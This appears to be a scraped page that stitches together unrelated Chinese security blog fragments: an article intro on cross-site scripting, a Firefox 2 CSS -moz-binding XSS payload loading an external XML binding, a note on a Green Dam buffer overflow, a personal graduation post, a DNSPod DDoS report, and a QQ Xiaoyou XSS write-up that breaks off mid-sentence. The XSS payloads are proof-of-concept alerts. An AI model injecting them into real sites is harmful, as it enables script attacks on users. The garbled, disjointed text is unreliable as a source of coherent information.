作者：褚诚云

《程序员》文章。申明。文章仅代表个人观点，与所在公司无任何联系。

1.概述

跨站脚本Cross-Site Scripting（XSS）是最为流行的Web安全漏洞之一。据统计，2007年，跨站脚本类的安全漏洞的数目已经远远超出传统类型的安全漏洞【1】。那么，什么是跨站脚本？它的危害性是什么？Web开发人员如何在开发过程中避免这类的安全漏洞？就是我们这篇文章要讨论的内容。

1. firefox2 css xss vulnerabilities

<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>

test.xml:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<bindingSpellE">xss">
<implementation>
<constructor><![CDATA[alert('XSS')]]></constructor>
</implementation>
</binding>

Green Dam remote buffer overflow exploit

"Green Dam" is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.

好多天没有更新BLOG了~
毕业了~呵呵~
人在上海 浦东~收拾自己租的房子~准备步入社会 参加工作了~呵呵~满心期待

18日开始,著名免费dns服务提供商的6台服务器开始受到攻击.dnspod为诸多网站提供域名解析服务,其中包含暴风影音.

18日晚上20点33分59秒.在史无前例的大流量攻击下dnspod的6台解析服务器开始失效,大量网站开始间歇性无法访问,其中包括国内诸多知名网站,当然,其中也包含我的不知名网站.第一波攻击的流量在21点30分左右达到高峰,流量超过了10Gbps,如下图 ,要知道,一个电信核心机房的带宽也仅仅最多只有几十G

作者:孤鸿影

作者已通知腾讯。

漏洞一:

QQ校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。

QQ校友使用了Ajax技术，来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML，所以直接插入代码: <script>alert('孤鸿影')</script>不会被执行。使用下面的格式既可：<